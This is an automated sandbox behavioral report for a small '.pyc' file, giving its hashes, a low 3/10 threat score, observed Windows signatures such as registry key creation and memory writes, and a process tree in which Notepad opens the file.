Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2024 13:55
Behavioral task
behavioral1
Sample
SolaraBootstrapper.exe
Resource
win10v2004-20240508-en
26 signatures
150 seconds
Behavioral task
behavioral2
Sample
.pyc
Resource
win10v2004-20240426-en
4 signatures
150 seconds
General
-
Target
.pyc
-
Size
1KB
-
MD5
e07e80f50106ec7a618422a0ef94fafb
-
SHA1
c734af858cf372ea19f5241822642306b25f2fb9
-
SHA256
f46c97959fd249eda81df23962fad100779918e59efbc95ef26c91c0b4454418
-
SHA512
61a24cb45fd9e0a914d4127037abaa0553ab888e9c13485237538a51e99314858256bdd8e5d0a4e7aef1935fbe93d22eab559fa0b3a6e5f4d7e66a3ef0e9fcdc
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
Processes:
cmd.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings OpenWith.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
OpenWith.exepid process 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe 848 OpenWith.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
OpenWith.exedescription pid process target process PID 848 wrote to memory of 3612 848 OpenWith.exe NOTEPAD.EXE PID 848 wrote to memory of 3612 848 OpenWith.exe NOTEPAD.EXE
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\.pyc1⤵
- Modifies registry class
PID:4216
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\.pyc2⤵PID:3612